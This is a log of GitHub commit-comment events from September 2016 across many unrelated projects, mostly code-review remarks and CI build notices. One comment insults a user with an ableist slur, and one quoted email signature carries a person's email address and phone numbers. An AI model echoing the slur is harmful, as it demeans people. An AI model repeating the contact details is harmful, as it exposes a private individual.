{"id":"4548525783","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982744,"position":null,"line":null,"path":null,"commit_id":"1b9ef9dc4e2f478353b6debe80bd97b4bce937da","created_at":"2016-09-12T10:35:22Z","updated_at":"2016-09-12T10:35:22Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 240](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1196&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T10:35:22Z"}
{"id":"4548533981","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982759,"position":29,"line":29,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:37:22Z","updated_at":"2016-09-12T10:37:22Z","body":"Doesn't seem like it?!\r\nFor comparison: [MIT license](https://opensource.org/licenses/MIT)"}},"created_at":"2016-09-12T10:37:22Z"}
{"id":"4548537558","type":"CommitCommentEvent","actor":{"login":"ilozano2"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18982766,"position":null,"line":null,"path":null,"commit_id":"939a3672d4c2f65a6c8d04ebe7cacb621d8a1485","created_at":"2016-09-12T10:38:15Z","updated_at":"2016-09-12T10:38:15Z","body":"Yeah! I've posted the problem at Google Group:\r\n\r\n https://groups.google.com/forum/#!topic/edx-code/xkIoge6vBMQ\r\n\r\nBriefly, courses marked as \"new\" in the Advance settings were decorated with a \"new\" badge in the course catalog. \r\n\r\nthx!"}},"created_at":"2016-09-12T10:38:15Z"}
{"id":"4548537777","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982767,"position":4,"line":4,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:38:18Z","updated_at":"2016-09-12T10:38:18Z","body":"Absolutely. Will be changed in the next commit."}},"created_at":"2016-09-12T10:38:18Z"}
{"id":"4548538675","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18982769,"position":42,"line":22,"path":"dnf-docker-test/features/repolist-1.feature","commit_id":"981f8401175bec8eb17e0f9436f94d6f2c433efd","created_at":"2016-09-12T10:38:31Z","updated_at":"2016-09-12T10:38:31Z","body":"put it into feature setup and at this point just remove all repos. or... probably I was just wrong and split it ;)"}},"created_at":"2016-09-12T10:38:31Z"}
{"id":"4548539276","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18982771,"position":null,"line":null,"path":null,"commit_id":"c84e74526e533f3ee14b8d6f90a82c3bb23ef400","created_at":"2016-09-12T10:38:41Z","updated_at":"2016-09-12T10:38:41Z","body":"@PhantomAssassin12 Do you know any other phone that has Mali 400 GPU has Nougat? I can base on them."}},"created_at":"2016-09-12T10:38:41Z"}
{"id":"4548540110","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18982774,"position":46,"line":26,"path":"dnf-docker-test/features/repolist-1.feature","commit_id":"981f8401175bec8eb17e0f9436f94d6f2c433efd","created_at":"2016-09-12T10:38:53Z","updated_at":"2016-09-12T10:38:53Z","body":"I think you even didn't test it, as there is no such commands ;)"}},"created_at":"2016-09-12T10:38:53Z"}
{"id":"4548541233","type":"CommitCommentEvent","actor":{"login":"saliceti"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18982775,"position":6,"line":10,"path":"manifests/bosh-manifest/deployments/050-datadog.yml","commit_id":"beb80bc7bb1e79c5c5edf53c660722172c13698a","created_at":"2016-09-12T10:39:12Z","updated_at":"2016-09-12T10:39:12Z","body":"datadog yaml could be created inside shared from beginning, so no need to move"}},"created_at":"2016-09-12T10:39:12Z"}
{"id":"4548541319","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18982776,"position":32,"line":12,"path":"dnf-docker-test/features/repolist-1.feature","commit_id":"981f8401175bec8eb17e0f9436f94d6f2c433efd","created_at":"2016-09-12T10:39:13Z","updated_at":"2016-09-12T10:39:13Z","body":"command doesn't exist"}},"created_at":"2016-09-12T10:39:13Z"}
{"id":"4548544684","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"danielearwicker/immuto"},"payload":{"comment":{"id":18982782,"position":null,"line":null,"path":null,"commit_id":"5b4587331047e6bed39986f99fd116bb4be734f3","created_at":"2016-09-12T10:40:01Z","updated_at":"2016-09-12T10:40:01Z","body":"😚🌹"}},"created_at":"2016-09-12T10:40:01Z"}
{"id":"4548547347","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18982786,"position":154,"line":154,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T10:40:38Z","updated_at":"2016-09-12T10:40:38Z","body":"As you wish but then you'll make it impossible to use without packages, eg. binary tarball. Also when checking for client package installation you must take into consideration which distribution it is, so you need to use yum/dpkg."}},"created_at":"2016-09-12T10:40:38Z"}
{"id":"4548547770","type":"CommitCommentEvent","actor":{"login":"jbleyel"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18982787,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T10:40:44Z","updated_at":"2016-09-12T10:40:44Z","body":"Das einige was jetzt noch nicht passt ist der master branch auf oe-alliance, den der sollte doch eigentlich identisch zum master von E2OpenPlugins sein. Der 2. branch auf oe-alliance kann dann theoretisch weg? Oder was meinst du?"}},"created_at":"2016-09-12T10:40:44Z"}
{"id":"4548548120","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982788,"position":28,"line":28,"path":"readme.md","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:40:49Z","updated_at":"2016-09-12T10:40:49Z","body":"You're probably right, even though that's only an example on how to use the core function, so I'm not sure if it really matters."}},"created_at":"2016-09-12T10:40:49Z"}
{"id":"4548550673","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982794,"position":28,"line":28,"path":"readme.md","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:41:29Z","updated_at":"2016-09-12T10:41:29Z","body":"But I'm going to change it anyway."}},"created_at":"2016-09-12T10:41:29Z"}
{"id":"4548551708","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18982795,"position":null,"line":null,"path":null,"commit_id":"09f624a6cb8bb2936accda3b8ccc996dd542c6aa","created_at":"2016-09-12T10:41:45Z","updated_at":"2016-09-12T10:41:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CsMTT9Bm&#x2F;1992-bugzilla-bug-992019-ceph-deploy-create-osd-may-not-set-guid-of-existing-journal-partition\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bugzilla – Bug 992019 &quot;ceph-deploy create osd&quot; may not set GUID of existing journal partition</a>"}},"created_at":"2016-09-12T10:41:45Z"}
{"id":"4548552154","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18982796,"position":null,"line":null,"path":null,"commit_id":"d984423cc00e6a8c483f1570453d61f31f61886d","created_at":"2016-09-12T10:41:52Z","updated_at":"2016-09-12T10:41:52Z","body":"ImageRender has two constructors: One for the python ImageRender and on other for the python ImageMirror (yes it's odd, an inheritance will be much better here). The problem here was that the `m_updateShadowBuffer` wasn't initialized in the python ImageMirror constructor."}},"created_at":"2016-09-12T10:41:52Z"}
{"id":"4548552977","type":"CommitCommentEvent","actor":{"login":"alexsedova"},"repo":{"name":"Praqma/tracey-broker"},"payload":{"comment":{"id":18982798,"position":91,"line":91,"path":"src/main/java/net/praqma/tracey/broker/rabbitmq/RabbitMQConnection.java","commit_id":"70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72","created_at":"2016-09-12T10:42:05Z","updated_at":"2016-09-12T10:42:05Z","body":"Just a comment. We could use getOrDefault, defined in Map  "}},"created_at":"2016-09-12T10:42:05Z"}
{"id":"4548554915","type":"CommitCommentEvent","actor":{"login":"DuckyDuckling"},"repo":{"name":"Wozar/dragon-icetea"},"payload":{"comment":{"id":18982802,"position":null,"line":null,"path":null,"commit_id":"d862c4e05643b259021e237c70fc38319ff33b2d","created_at":"2016-09-12T10:42:32Z","updated_at":"2016-09-12T10:42:32Z","body":"gg"}},"created_at":"2016-09-12T10:42:32Z"}
{"id":"4548556363","type":"CommitCommentEvent","actor":{"login":"tomalec"},"repo":{"name":"PuppetJs/PuppetJs"},"payload":{"comment":{"id":18982805,"position":144,"line":454,"path":"src/puppet.js","commit_id":"616de4b283b94462be0e93707152e58c5c29b7a4","created_at":"2016-09-12T10:42:53Z","updated_at":"2016-09-12T10:42:53Z","body":"@joozek78 `responseText` is undefined"}},"created_at":"2016-09-12T10:42:53Z"}
{"id":"4548566753","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982835,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:45:28Z","updated_at":"2016-09-12T10:45:28Z","body":"You're right, but wouldn't that be a little overkill?"}},"created_at":"2016-09-12T10:45:28Z"}
{"id":"4548567816","type":"CommitCommentEvent","actor":{"login":"Andrey9kin"},"repo":{"name":"Praqma/tracey-broker"},"payload":{"comment":{"id":18982837,"position":91,"line":91,"path":"src/main/java/net/praqma/tracey/broker/rabbitmq/RabbitMQConnection.java","commit_id":"70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72","created_at":"2016-09-12T10:45:45Z","updated_at":"2016-09-12T10:45:45Z","body":"Can you give me an example?\n\n\nOn Monday, 12 September 2016, alexsedova <notifications@github.com> wrote:\n\n> Just a comment. We could use getOrDefault, defined in Map\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Praqma/tracey-broker/commit/70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72#commitcomment-18982798>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABmB8ONsYN4gOUGuBnshdztDpmwE9bRbks5qpSx9gaJpZM4J6c76>\n> .\n>\n\n\n-- \nMake it a great day, Andrey\n[image: ____________________________________________________________]\nAndrey Devyatkin\nCEO, Praqma Sweden\nandrey@praqma.com\n+46  <+46%2072%20244%2018%2021>73 081 94 92\nPraqma\nwww.praqma.com\nDK: CPH, Aarhus, Allerod\nNO: OSL\nSE: STHLM\n+45 36 PRAQMA <+4536772762>\n"}},"created_at":"2016-09-12T10:45:45Z"}
{"id":"4548576828","type":"CommitCommentEvent","actor":{"login":"kamalhakim"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18982849,"position":null,"line":null,"path":null,"commit_id":"9cb6e87fa7e0a86268b3d3c085203ded4fb2d6aa","created_at":"2016-09-12T10:48:00Z","updated_at":"2016-09-12T10:48:00Z","body":"It is very fishy and hard to find out.. I need to set up a debugging env on  windows"}},"created_at":"2016-09-12T10:48:00Z"}
{"id":"4548577712","type":"CommitCommentEvent","actor":{"login":"angelitasasmita"},"repo":{"name":"angelitasasmita/angularjspro"},"payload":{"comment":{"id":18982851,"position":null,"line":null,"path":null,"commit_id":"a798b3d71263984c37c128fcfc3e45229afd9ce9","created_at":"2016-09-12T10:48:15Z","updated_at":"2016-09-12T10:48:15Z","body":"ERROR FOUND: SPACE!!!! BE careful with space next time."}},"created_at":"2016-09-12T10:48:15Z"}
{"id":"4548581048","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18982859,"position":154,"line":154,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T10:49:09Z","updated_at":"2016-09-12T10:49:09Z","body":"proxysql-admin-tool will be packed with ProxySQL package it will be installed in `/usr/bin` . So it is hard to get mysql client location from binary tar ball."}},"created_at":"2016-09-12T10:49:09Z"}
{"id":"4548581146","type":"CommitCommentEvent","actor":{"login":"Wilsonator5000"},"repo":{"name":"Wilsonator5000/Neefertale"},"payload":{"comment":{"id":18982860,"position":null,"line":null,"path":null,"commit_id":"ab651fc2eac9b9443f32bda7b01086e8477d3016","created_at":"2016-09-12T10:49:10Z","updated_at":"2016-09-12T10:49:10Z","body":"I think that should be updated more... Test it and see!"}},"created_at":"2016-09-12T10:49:10Z"}
{"id":"4548582743","type":"CommitCommentEvent","actor":{"login":"12563050"},"repo":{"name":"yokrysty/LoLAccountChecker"},"payload":{"comment":{"id":18982864,"position":null,"line":null,"path":null,"commit_id":"727412ce4bd41c12ac1f6d2fabc5c75f53b34034","created_at":"2016-09-12T10:49:33Z","updated_at":"2016-09-12T10:49:33Z","body":"IP is prohibited to have a way to solve it?"}},"created_at":"2016-09-12T10:49:33Z"}
{"id":"4548583329","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18982868,"position":null,"line":null,"path":null,"commit_id":"dcd91c4221789782744ae998dfd1e10b5a14abb5","created_at":"2016-09-12T10:49:42Z","updated_at":"2016-09-12T10:49:42Z","body":"Nothing is blocking in this while loop, right? Doesn't this take up more battery then? Or am I missing something?"}},"created_at":"2016-09-12T10:49:42Z"}
{"id":"4548584277","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"Laborst/Labs-C-"},"payload":{"comment":{"id":18982871,"position":27,"line":27,"path":"1st_work/Task_1/Task_1/Task_1/Program.cs","commit_id":"4e8c76fd99d0e10bb22af95bea25eecc0e83c7e0","created_at":"2016-09-12T10:49:57Z","updated_at":"2016-09-12T10:49:57Z","body":"У string есть метод StartsWith."}},"created_at":"2016-09-12T10:49:57Z"}
{"id":"4548584685","type":"CommitCommentEvent","actor":{"login":"ErikSchierboom"},"repo":{"name":"exercism/x-api"},"payload":{"comment":{"id":18982873,"position":null,"line":null,"path":null,"commit_id":"41a3d356c98fa474f91bc45d320f222854683558","created_at":"2016-09-12T10:50:04Z","updated_at":"2016-09-12T10:50:04Z","body":"@ramyaravindranath Okay cool.  Thanks for the feedback!"}},"created_at":"2016-09-12T10:50:04Z"}
{"id":"4548585952","type":"CommitCommentEvent","actor":{"login":"damianvila"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":18982877,"position":null,"line":null,"path":null,"commit_id":"e716d60d2cebe9dc830a09044b3eacc18d2dfb17","created_at":"2016-09-12T10:50:24Z","updated_at":"2016-09-12T10:50:24Z","body":"This fix kills the \"Advertisement\" (#ima-countdown-div) div if you place it outside the controls.\r\nIt would be better to fix the function inside videojs.ima.js (player.ima.hideAdControls_) adding \"sliderDiv.style.display = 'none';\", so the div is effectively hidden, regardless of the visibility of the container."}},"created_at":"2016-09-12T10:50:24Z"}
{"id":"4548588350","type":"CommitCommentEvent","actor":{"login":"sraue"},"repo":{"name":"OpenELEC/OpenELEC.tv"},"payload":{"comment":{"id":18982886,"position":null,"line":null,"path":null,"commit_id":"18b8ba44a4169f2d6dfe3239721d7bcfcce4e280","created_at":"2016-09-12T10:51:00Z","updated_at":"2016-09-12T10:51:00Z","body":"not sure if its wanted from the kodi devs"}},"created_at":"2016-09-12T10:51:00Z"}
{"id":"4548590045","type":"CommitCommentEvent","actor":{"login":"YuriyNasretdinov"},"repo":{"name":"getsupertext/soft-mocks"},"payload":{"comment":{"id":18982892,"position":null,"line":null,"path":null,"commit_id":"be1f22bd8d80b9e5c1548a8082c8f38d2d4a7fb4","created_at":"2016-09-12T10:51:27Z","updated_at":"2016-09-12T10:51:27Z","body":"You could actually hook into SoftMocks::rewrite(...) function instead and do not add any of AST-related code."}},"created_at":"2016-09-12T10:51:27Z"}
{"id":"4548592552","type":"CommitCommentEvent","actor":{"login":"minthemiddle"},"repo":{"name":"minthemiddle/powered-by-wordpress"},"payload":{"comment":{"id":18982902,"position":null,"line":null,"path":null,"commit_id":"c7c128f6125300334066d98fce4609321b75eec9","created_at":"2016-09-12T10:52:09Z","updated_at":"2016-09-12T10:52:09Z","body":"@towfiqi - I added a link to your great collection!"}},"created_at":"2016-09-12T10:52:09Z"}
{"id":"4548595052","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"Laborst/Labs-C-"},"payload":{"comment":{"id":18982904,"position":9,"line":9,"path":"1st_work/Task_2/Task_2/Task_2/Program.cs","commit_id":"d0391c053238299d215ea1742b0425e0b3b260ed","created_at":"2016-09-12T10:52:44Z","updated_at":"2016-09-12T10:52:44Z","body":"Здесь класс-то особо не нужен, просто три константы можно было оставить."}},"created_at":"2016-09-12T10:52:44Z"}
{"id":"4548595848","type":"CommitCommentEvent","actor":{"login":"vitalidze"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18982908,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T10:52:57Z","updated_at":"2016-09-12T10:52:57Z","body":"> Maybe my vps it`s runing out off memory. Im installing Java in windows to try it so.\r\n\r\nYes, it's possible. There should be some messages about before process exits with such error message.\r\n\r\n> Its is posible to download a traccar-web.war file with the #822 issue already fixed?. Thank you\r\n\r\nCurrently it's not available. But I plan to release a bug-fix update in nearest future, I hope on this week."}},"created_at":"2016-09-12T10:52:57Z"}
{"id":"4548596364","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18982909,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T10:53:05Z","updated_at":"2016-09-12T10:53:05Z","body":"I used 4 mb hash for my local test. The machine I used is slower than the average fishtest machine, so my 10+0.1 probably is 8+0.08 fishtest time. That does reduce the pressure on hash somewhat.\r\nI'll schedule an STC test with more hash."}},"created_at":"2016-09-12T10:53:05Z"}
{"id":"4548597566","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18982911,"position":2,"line":2,"path":"app/views/routes/_form.html.erb","commit_id":"ee0ff539653d8c9ce085b2de472de716f5bcdb1a","created_at":"2016-09-12T10:53:25Z","updated_at":"2016-09-12T10:53:25Z","body":"Почему не вынес паршл для ошибок?"}},"created_at":"2016-09-12T10:53:25Z"}
{"id":"4548600536","type":"CommitCommentEvent","actor":{"login":"ttstein"},"repo":{"name":"ttstein/IntentProjekt"},"payload":{"comment":{"id":18982916,"position":null,"line":null,"path":null,"commit_id":"e581705402f744350ca79bc2bb56a1feaa7494e1","created_at":"2016-09-12T10:54:11Z","updated_at":"2016-09-12T10:54:11Z","body":"Comment ...."}},"created_at":"2016-09-12T10:54:11Z"}
{"id":"4548601788","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18982918,"position":4,"line":3,"path":"Library/Homebrew/dev-cmd/test-bot.rb","commit_id":"ebdb879fe4b0d14bcc92480a3dd193c93f94a23f","created_at":"2016-09-12T10:54:29Z","updated_at":"2016-09-12T10:54:29Z","body":"`test-bot.rb` isn't for creating a pull request to boneyard a formula... I'm not sure how to best summarize this command though, so can't open a PR to fix it."}},"created_at":"2016-09-12T10:54:29Z"}
{"id":"4548612019","type":"CommitCommentEvent","actor":{"login":"peterjenkins1"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-users"},"payload":{"comment":{"id":18982937,"position":null,"line":null,"path":null,"commit_id":"b47fb2767f720d56f462028dc7bcf355f6f0c1c5","created_at":"2016-09-12T10:57:08Z","updated_at":"2016-09-12T10:57:08Z","body":"...and this is what I was hoping you had added since I last looked. That's another beer I owe you!"}},"created_at":"2016-09-12T10:57:08Z"}
{"id":"4548612865","type":"CommitCommentEvent","actor":{"login":"esby"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18982942,"position":8,"line":128,"path":"rtgui/guiutils.h","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-12T10:57:20Z","updated_at":"2016-09-12T10:57:20Z","body":"In delphi / lazarus, I'd just use a Tobject reference and a cast to the corresponding object (and a check to see the object is of the corresponding type). \r\n\r\nI guess replacing it by a pointer is not good either. this still poses the same issues...\r\n\r\nI guess I'll see when my other problems are solved."}},"created_at":"2016-09-12T10:57:20Z"}
{"id":"4548615589","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"Laborst/Labs-C-"},"payload":{"comment":{"id":18982951,"position":27,"line":27,"path":"1st_work/Task_2/Task_2/Task_2/Program.cs","commit_id":"d0391c053238299d215ea1742b0425e0b3b260ed","created_at":"2016-09-12T10:58:02Z","updated_at":"2016-09-12T10:58:02Z","body":"Я бы с осторожностью использовал оператор |, лучше обычное логическое сравнение ||. Это как минимум даст применить оптимизации, и попробовать не вычислять tokens[0].Equals('H'), если tokens[0].Equals('A') == true"}},"created_at":"2016-09-12T10:58:02Z"}
{"id":"4548619900","type":"CommitCommentEvent","actor":{"login":"ahmedbadr3"},"repo":{"name":"gocardless/splash-pages"},"payload":{"comment":{"id":18982956,"position":null,"line":null,"path":null,"commit_id":"f7009dd1febf8a9b4c8c268be77d56c4e519b5f1","created_at":"2016-09-12T10:59:06Z","updated_at":"2016-09-12T10:59:06Z","body":"@waltfy thanks for getting these up - I noticed we duped 'Thank you for visiting our site' at the bottom - can we delete 15.2? Thanks!"}},"created_at":"2016-09-12T10:59:06Z"}
{"id":"4548623955","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18982964,"position":52,"line":310,"path":"install-rdo.sh","commit_id":"aab562645ecc5b19e8d9c3a1615246beb43ce395","created_at":"2016-09-12T11:00:05Z","updated_at":"2016-09-12T11:00:05Z","body":"put the networking-hyperv-install in a method"}},"created_at":"2016-09-12T11:00:05Z"}
{"id":"4548624964","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18982968,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-12T11:00:21Z","updated_at":"2016-09-12T11:00:21Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.165](http://build.clear-measure.com/viewLog.html?buildId=10409&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-12T11:00:21Z"}
{"id":"4548625293","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18982969,"position":null,"line":null,"path":null,"commit_id":"d984423cc00e6a8c483f1570453d61f31f61886d","created_at":"2016-09-12T11:00:25Z","updated_at":"2016-09-12T11:00:25Z","body":"ah yes! Good catch!"}},"created_at":"2016-09-12T11:00:25Z"}
{"id":"4548628045","type":"CommitCommentEvent","actor":{"login":"paretje"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18982973,"position":null,"line":null,"path":null,"commit_id":"dcd91c4221789782744ae998dfd1e10b5a14abb5","created_at":"2016-09-12T11:01:03Z","updated_at":"2016-09-12T11:01:03Z","body":"Yes, `-quiet` makes xclip run in foreground, thus blocking the loop until someone else claims the clipboard. The only drawback to `clipit --daemon` is that everything is copied twice, also those which are already handled by xclip/xsel. But this is event-based, while clipit reads the clipboard every 500ms."}},"created_at":"2016-09-12T11:01:03Z"}
{"id":"4548628483","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18982975,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T11:01:11Z","updated_at":"2016-09-12T11:01:11Z","body":"About config : the twig files must be allowed in template upload by default ? If yes : we allow .html in https://github.com/LimeSurvey/LimeSurvey/blob/master/application/config/config-defaults.php#L85 ?"}},"created_at":"2016-09-12T11:01:11Z"}
{"id":"4548630203","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18982978,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:01:34Z","updated_at":"2016-09-12T11:01:34Z","body":"It wasn't in cse, you retard. "}},"created_at":"2016-09-12T11:01:34Z"}
{"id":"4548630441","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18982981,"position":57,"line":315,"path":"install-rdo.sh","commit_id":"aab562645ecc5b19e8d9c3a1615246beb43ce395","created_at":"2016-09-12T11:01:37Z","updated_at":"2016-09-12T11:01:37Z","body":"don t use cd, use pushd and popd, is not so prone to errors."}},"created_at":"2016-09-12T11:01:37Z"}
{"id":"4548631953","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18982983,"position":67,"line":331,"path":"install-rdo.sh","commit_id":"aab562645ecc5b19e8d9c3a1615246beb43ce395","created_at":"2016-09-12T11:02:00Z","updated_at":"2016-09-12T11:02:00Z","body":"put this rpm path in a variable, so it s easier to change it"}},"created_at":"2016-09-12T11:02:00Z"}
{"id":"4548634500","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18982990,"position":null,"line":null,"path":null,"commit_id":"c84e74526e533f3ee14b8d6f90a82c3bb23ef400","created_at":"2016-09-12T11:02:38Z","updated_at":"2016-09-12T11:02:38Z","body":"nothing dude."}},"created_at":"2016-09-12T11:02:38Z"}
{"id":"4548635352","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18982994,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-12T11:02:49Z","updated_at":"2016-09-12T11:02:49Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.165](http://build.clear-measure.com/viewLog.html?buildId=10409&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:26"}},"created_at":"2016-09-12T11:02:49Z"}
{"id":"4548638677","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983001,"position":null,"line":null,"path":null,"commit_id":"1b9ef9dc4e2f478353b6debe80bd97b4bce937da","created_at":"2016-09-12T11:03:35Z","updated_at":"2016-09-12T11:03:35Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 240](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1196&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:13"}},"created_at":"2016-09-12T11:03:35Z"}
{"id":"4548638794","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983002,"position":null,"line":null,"path":null,"commit_id":"9a066dd62f09bd41165c18e475db828d8eeda3ed","created_at":"2016-09-12T11:03:37Z","updated_at":"2016-09-12T11:03:37Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 241](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1197&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T11:03:37Z"}
{"id":"4548640681","type":"CommitCommentEvent","actor":{"login":"grabbou"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18983008,"position":null,"line":null,"path":null,"commit_id":"c18d1dfd7d46c50320bfea83a7d48e829b579e93","created_at":"2016-09-12T11:04:06Z","updated_at":"2016-09-12T11:04:06Z","body":"Thanks, fixed :)"}},"created_at":"2016-09-12T11:04:06Z"}
{"id":"4548641569","type":"CommitCommentEvent","actor":{"login":"bugant"},"repo":{"name":"DockYard/ember-changeset"},"payload":{"comment":{"id":18983011,"position":12,"line":182,"path":"tests/unit/changeset-test.js","commit_id":"9c3a16de22733aef28fc471f1170b2c54f2d9663","created_at":"2016-09-12T11:04:20Z","updated_at":"2016-09-12T11:04:20Z","body":"Is this line ever run? It comes after a return statement"}},"created_at":"2016-09-12T11:04:20Z"}
